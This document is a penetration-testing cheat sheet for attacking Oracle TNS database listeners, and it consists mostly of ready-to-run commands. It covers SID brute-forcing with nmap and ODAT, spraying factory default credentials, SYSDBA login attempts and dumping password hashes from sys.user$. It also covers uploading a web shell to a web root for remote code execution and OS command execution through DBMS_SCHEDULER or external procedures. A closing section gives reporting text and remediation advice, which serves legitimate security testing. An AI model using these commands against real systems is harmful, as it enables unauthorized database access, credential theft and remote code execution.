🛡️ Methodology Checklist
- Detect Oracle TNS:
nmap -p 1521 --script oracle-tns-version [TARGET] - Enumerate SIDs:
nmap -p 1521 --script oracle-sid-brute [TARGET] - Or use ODAT:
odat sidguesser -s [TARGET] - Default creds: scott/tiger, sys/oracle, system/manager
- Brute-force with ODAT:
odat passwordguesser -s [TARGET] -d [SID] - If authenticated: enumerate tables, extract data
- Upload/execute via ODAT:
odat utlfile,odat dbmsscheduler - Check for OS command execution via JAVA/extproc
🎯 Operational Context
Think Dumber First: Try SID
XE,ORCL,DB,TESTbefore running a full brute-force — these are the most common Oracle SIDs. After SID confirmation, sprayscott/tiger,system/manager,sys/change_on_install. These Oracle factory defaults persist in many corporate environments. ODAT is your all-in-one Oracle exploitation toolkit.
When you land here: Port 1521 open. Confirm Oracle TNS listener: tnscmd10g version -h [TARGET]. Enumerate SIDs with odat sidguesser or nmap --script oracle-sid-brute. After SID obtained, authenticate and escalate privileges.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -p1521 -sV [TARGET_IP] --open | Detect Oracle TNS listener |
sudo nmap -p1521 -sV [TARGET_IP] --open --script oracle-sid-brute | Brute-force Oracle SID |
./odat.py all -s [TARGET_IP] | Run all ODAT modules — find credentials and misconfigs |
sqlplus scott/tiger@[TARGET_IP]/XE | Connect to Oracle DB with credentials |
sqlplus scott/tiger@[TARGET_IP]/XE as sysdba | Connect as SYSDBA (privilege escalation attempt) |
select table_name from all_tables; | List all tables (inside SQL> prompt) |
select * from user_role_privs; | Check current user privileges |
select name, password from sys.user$; | Dump password hashes |
python3 ./odat.py utlfile -s [TARGET_IP] -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt | Upload file via ODAT (RCE via web shell) |
curl -X GET http://[TARGET_IP]/testing.txt | Verify uploaded file is accessible |
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig | Fix shared library error for sqlplus |
🔬 Deep Dive & Workflow
Initial Enumeration
- Nmap detect listener:
sudo nmap -p1521 -sV [TARGET_IP] --open - Brute-force SID:
sudo nmap -p1521 --script oracle-sid-brute [TARGET_IP] - Run ODAT all modules:
./odat.py all -s [TARGET_IP] - Try default credentials:
scott/tiger,dbsnmp/dbsnmp,CHANGE_ON_INSTALL - Connect with sqlplus:
sqlplus [USER]/[PASS]@[TARGET_IP]/[SID]
Attacks
- Attempt SYSDBA login:
sqlplus [USER]/[PASS]@[TARGET_IP]/[SID] as sysdba - Enumerate privileges:
select * from user_role_privs; - Dump password hashes:
select name, password from sys.user$; - Upload web shell via ODAT
utlfilemodule to IIS/Apache web root - Verify RCE:
curl -X GET http://[TARGET_IP]/[UPLOADED_FILE]
Core Concept
Oracle TNS (Transparent Network Substrate) facilitates connections between Oracle databases and applications. Supports SSL/TLS, IPv6, connection management and load balancing.
Critical: A valid SID (System Identifier) is required to connect. Without it, connection is often impossible.
Configuration Files ($ORACLE_HOME/network/admin)
| File | Side | Purpose |
|---|---|---|
tnsnames.ora | Client | Resolves service names to IP/Port |
listener.ora | Server | Defines listener and services |
PlsqlExclusionList | Server | Blacklist for PL/SQL packages |
Default Credentials
| Product | Username | Password |
|---|---|---|
| Oracle 9 | — | CHANGE_ON_INSTALL |
| DBSNMP service | dbsnmp | dbsnmp |
| Classic | scott | tiger |
Tool Setup (ODAT)
git clone https://github.com/quentinhardy/odat.git
cd odat/
pip install python-libnmap cx_Oracle
git submodule init && git submodule update
sudo pip3 install colorlog termcolor passlib pycryptodome🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| odat returns ‘connection refused’ on 1521 | Non-standard TNS port or listener paused | Check ports 1521-1530 with nmap; try lsnrctl status if local access; use tnscmd10g ping -h [TARGET] to test listener |
| SID brute-force returns no results | Very uncommon SID used | Use full SecLists oracle-sids.txt (2000+ entries); try enumerating via TNS listener directly: tnscmd10g tnsping -h [TARGET] |
| sqlplus ‘ORA-12170: Connect timeout occurred’ | TNS listener filtering by source IP | Confirm TCP/1521 reachable: nc -nv [TARGET] 1521; try from a pivot host in the allowed subnet |
| TNS Poison attack has no effect | Oracle 11g R2+ patched (2010+) | Check listener version: tnscmd10g version -h [TARGET]; TNS Poison only viable on pre-11gR2; escalate via credential attacks instead |
| odat results inconsistent between runs | Session limit on listener or rate limiting | Reduce odat threads: --threads 1; add delay; use --sysdba flag for elevated context |
📝 Reporting Trigger
Finding Title: Oracle TNS Listener with Default Credentials / Unauthenticated Enumeration
Impact: DBA-level database access via default credentials — full schema read/write, OS command execution via DBMS_SCHEDULER or external procedures, and potential lateral movement via linked databases.
Root Cause: Oracle factory default credentials (scott/tiger, system/manager) not rotated. TNS listener accessible without authentication, enabling SID enumeration.
Recommendation: Rotate all Oracle default accounts immediately. Restrict TNS listener access by IP. Set a listener password (lsnrctl set password). Disable external procedures if unused. Enable Oracle Audit to log all connection attempts.